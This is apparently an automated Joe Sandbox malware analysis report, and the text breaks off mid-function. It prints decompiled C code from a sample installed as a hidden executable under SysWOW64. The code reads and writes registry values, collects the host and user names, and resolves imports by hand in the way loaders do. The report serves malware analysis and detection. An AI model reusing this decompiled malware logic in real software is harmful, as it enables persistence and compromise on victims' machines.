                                                                                • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction Fuzzy Hash: 0F5150B1601B419FD7249F29C5C952ABBE9FB48704F60693EE18BE7A90D774F840CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004080C9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}























                                                                                0x004080c9
                                                                                0x004080d7
                                                                                0x004080da
                                                                                0x004080e0
                                                                                0x004080ed
                                                                                0x0040810b
                                                                                0x00408110
                                                                                0x00408115
                                                                                0x00000000
                                                                                0x00408130
                                                                                0x00408151
                                                                                0x00408156
                                                                                0x00408167
                                                                                0x00408216
                                                                                0x0040821d
                                                                                0x00408222
                                                                                0x00000000
                                                                                0x00408222
                                                                                0x0040818b
                                                                                0x004081f7
                                                                                0x004081f7
                                                                                0x004081fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408201
                                                                                0x00408206
                                                                                0x00000000
                                                                                0x00408198
                                                                                0x0040819b
                                                                                0x004081a0
                                                                                0x004081a1
                                                                                0x004081a8
                                                                                0x0040820d
                                                                                0x00408210
                                                                                0x00000000
                                                                                0x00408210
                                                                                0x004081aa
                                                                                0x004081c2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004081c4
                                                                                0x004081ca
                                                                                0x004081cd
                                                                                0x004081cd
                                                                                0x004081cf
                                                                                0x004081d0
                                                                                0x004081d8
                                                                                0x004081dd
                                                                                0x004081de
                                                                                0x004081e5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004081ef
                                                                                0x0040820c
                                                                                0x0040820c
                                                                                0x00000000
                                                                                0x0040820c
                                                                                0x0040818b
                                                                                0x004080ef
                                                                                0x004080ef
                                                                                0x00408225
                                                                                0x00408225
                                                                                0x0040822b
                                                                                0x0040822d
                                                                                0x00408233
                                                                                0x0040823f
                                                                                0x00408244
                                                                                0x0040824b
                                                                                0x0040824d
                                                                                0x00408259
                                                                                0x0040825e
                                                                                0x00408264
                                                                                0x00408269
                                                                                0x0040824b
                                                                                0x00408233
                                                                                0x00408273
                                                                                0x00408273

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 0040815F
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408187
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 004081BE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408210
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                  • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 124786226-2070294517
                                                                                • Opcode ID: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                • Opcode Fuzzy Hash: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3E2FC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,00E3E50A,00000000,00000000,00000000,00020106,00000000,00E3E50A,00000000,000000E4), ref: 00E3E319
                                                                                • RegSetValueExA.ADVAPI32(00E3E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 00E3E38E
                                                                                • RegDeleteValueA.ADVAPI32(00E3E50A,?,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D), ref: 00E3E3BF
                                                                                • RegCloseKey.ADVAPI32(00E3E50A,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D,00E3E50A), ref: 00E3E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID: D
                                                                                • API String ID: 2667537340-185221428
                                                                                • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction ID: 3ff6d8f2fc2ae45b03cbad79b1982d6135ec076f6080536e265c101d53fe6843
                                                                                • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction Fuzzy Hash: 18213C71A0021DBBDF209FA5EC89EEF7FB9EF08754F048061F904E6151E6719A54DBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E371C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00E371E1
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E37228
                                                                                • LocalFree.KERNEL32(?,?,?), ref: 00E37286
                                                                                • wsprintfA.USER32 ref: 00E3729D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                • String ID: |
                                                                                • API String ID: 2539190677-2343686810
                                                                                • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction ID: a8c788cf5b230ffa42899883ba21c2275f732d7d239d3db5154977f59038a929
                                                                                • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction Fuzzy Hash: 65313AB2904208BBCB11DFA8DC49ADA7FFCEF04314F148066F859EB111EA75DA48CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AD08 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55stringnetworkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}









                                                                                0x0040ad1c
                                                                                0x0040ad24
                                                                                0x0040ad71
                                                                                0x0040ad74
                                                                                0x0040ad77
                                                                                0x0040ad88
                                                                                0x0040ad88
                                                                                0x00000000
                                                                                0x0040ad7f
                                                                                0x0040ad26
                                                                                0x0040ad29
                                                                                0x0040ad2c
                                                                                0x0040ad2f
                                                                                0x0040ad55
                                                                                0x0040ad35
                                                                                0x0040ad3d
                                                                                0x0040ad45
                                                                                0x0040ad4d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ad4d
                                                                                0x0040ad45
                                                                                0x00000000
                                                                                0x0040ad4f
                                                                                0x0040ad4f
                                                                                0x0040ad4f
                                                                                0x0040ad51
                                                                                0x0040ad52
                                                                                0x0040ad52
                                                                                0x0040ad53
                                                                                0x00000000
                                                                                0x0040ad53
                                                                                0x0040ad35
                                                                                0x0040ad60
                                                                                0x0040ad66
                                                                                0x0040ad69
                                                                                0x0040ad6b
                                                                                0x0040ad6b
                                                                                0x00000000

                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$gethostnamelstrcpy
                                                                                • String ID: LocalHost
                                                                                • API String ID: 3695455745-3154191806
                                                                                • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E3CA Relevance: 7.6, APIs: 5, Instructions: 136registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						_t75 =  *0x4136c4; // 0x0
						E00402544(_t75, _t75, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}
























                                                                                0x0040e3ca
                                                                                0x0040e3e0
                                                                                0x0040e3ee
                                                                                0x0040e528
                                                                                0x0040e52d
                                                                                0x0040e52d
                                                                                0x0040e3f4
                                                                                0x0040e3f9
                                                                                0x0040e3fb
                                                                                0x0040e3fb
                                                                                0x0040e3fe
                                                                                0x0040e3fe
                                                                                0x0040e400
                                                                                0x0040e401
                                                                                0x0040e407
                                                                                0x0040e409
                                                                                0x0040e40f
                                                                                0x0040e413
                                                                                0x0040e413
                                                                                0x0040e41c
                                                                                0x0040e421
                                                                                0x0040e429
                                                                                0x0040e42c
                                                                                0x0040e42f
                                                                                0x0040e43a
                                                                                0x0040e452
                                                                                0x0040e51d
                                                                                0x0040e520
                                                                                0x00000000
                                                                                0x0040e458
                                                                                0x0040e458
                                                                                0x0040e458
                                                                                0x0040e45b
                                                                                0x0040e463
                                                                                0x0040e469
                                                                                0x0040e46e
                                                                                0x0040e484
                                                                                0x0040e48a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e491
                                                                                0x0040e494
                                                                                0x0040e499
                                                                                0x0040e4a1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4a3
                                                                                0x0040e4a6
                                                                                0x0040e4a9
                                                                                0x0040e4ae
                                                                                0x0040e4b4
                                                                                0x0040e4b9
                                                                                0x0040e4d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4d5
                                                                                0x0040e4da
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4dc
                                                                                0x0040e4df
                                                                                0x0040e4e1
                                                                                0x0040e4e6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e4e6
                                                                                0x0040e4e8
                                                                                0x0040e4ea
                                                                                0x0040e4ec
                                                                                0x0040e500
                                                                                0x0040e50e
                                                                                0x0040e516
                                                                                0x0040e516
                                                                                0x00000000
                                                                                0x0040e4ea

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID:
                                                                                • API String ID: 1586453840-0
                                                                                • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3B478 Relevance: 7.6, APIs: 5, Instructions: 131timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00E3B51A
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E3B529
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E3B548
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 00E3B590
                                                                                • wsprintfA.USER32 ref: 00E3B61E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                • String ID:
                                                                                • API String ID: 4026320513-0
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 8aa93a9cc2750e555fe67b52dc4b4a2c9ee464e490911d9cb2a1bd2927c44ac1
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: 345100B1D0021DAACF14DFD5D8895EEBBB9BF48304F10816AF605B6150E7B94AC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404280 Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x61;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}
















                                                                                0x00404280
                                                                                0x00404290
                                                                                0x00404296
                                                                                0x0040429b
                                                                                0x004042b1
                                                                                0x004042ba
                                                                                0x004043c1
                                                                                0x004043ca
                                                                                0x004043cd
                                                                                0x00000000
                                                                                0x004043ce
                                                                                0x004042c0
                                                                                0x004042c3
                                                                                0x004042c8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004042dc
                                                                                0x004042e6
                                                                                0x00404300
                                                                                0x004043bb
                                                                                0x00000000
                                                                                0x00404318
                                                                                0x00404322
                                                                                0x0040432c
                                                                                0x00404333
                                                                                0x00404336
                                                                                0x00404342
                                                                                0x00404345
                                                                                0x00404350
                                                                                0x00404359
                                                                                0x0040435f
                                                                                0x00404366
                                                                                0x00404371
                                                                                0x00404375
                                                                                0x00404368
                                                                                0x00404368
                                                                                0x00404368
                                                                                0x00404384
                                                                                0x0040438a
                                                                                0x0040439a
                                                                                0x004043ab
                                                                                0x004043ae
                                                                                0x004043b5
                                                                                0x00000000
                                                                                0x004043b5
                                                                                0x00404300
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateEvent
                                                                                • String ID:
                                                                                • API String ID: 1371578007-0
                                                                                • Opcode ID: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction ID: 96190e95dfac0256a72039fb05246d043f10f1ed4b28fe2ef93a25e2cd6a7057
                                                                                • Opcode Fuzzy Hash: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction Fuzzy Hash: D94181B1900209BADB109BA2CD45FDFBFBCEF40355F104566F604B21C1D7789A51DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E362D0 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 00E36303
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00E3632A
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00E363B1
                                                                                • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 00E36405
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HugeRead$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 3498078134-0
                                                                                • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction ID: eb5918cef2f9c6686a5f5e5db8bac43ae760f8d67e54d3a57cd08f2332a1441d
                                                                                • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction Fuzzy Hash: F3414C71A00205FBDB14CF68C888BA9BBB4FF44358F24D169E956E7290D771ED40CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406069 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
